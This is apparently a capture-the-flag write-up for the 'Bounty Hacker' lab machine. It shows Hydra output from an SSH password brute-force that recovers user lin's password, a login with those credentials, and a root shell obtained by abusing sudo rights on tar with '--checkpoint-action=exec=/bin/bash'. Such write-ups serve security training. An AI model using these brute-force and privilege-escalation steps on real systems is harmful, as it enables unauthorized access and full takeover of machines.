Skip to main content

Bounty Hacker

HYDRA

We were able to Brute-Force the credentials of the User: lin
Brute-Forcing SSH: RedDr4gonSynd1cat3

[DATA] attacking ssh://10.10.21.169:22/
[22][ssh] host: 10.10.21.169   login: lin   password: RedDr4gonSynd1cat3

Privilege Escalation

Using SSH Credentials to Login: lin:RedDr4gonSynd1cat3

lin@bountyhacker:~/Desktop$ id
uid=1001(lin) gid=1001(lin) groups=1001(lin)

The User lin can run: /bin/tar as ROOT

lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin: 
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar

Using tar to Escalate Privileges.

lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
root@bountyhacker:~/Desktop$ id
uid=0(root) gid=0(root) groups=0(root)

HYDRA
Privilege Escalation